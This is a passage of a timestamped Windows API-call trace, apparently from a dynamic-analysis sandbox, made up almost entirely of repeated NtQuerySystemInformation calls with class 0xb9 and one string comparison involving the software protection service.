NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd010, Length=0x20, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x50, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc80, Length=0x50, ResultLength=0x0) [0281.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbb0, Length=0x38, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdc0, Length=0x28, ResultLength=0x0) [0281.989] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce40, Length=0x50, ResultLength=0x0) [0281.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x40, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0282.004] 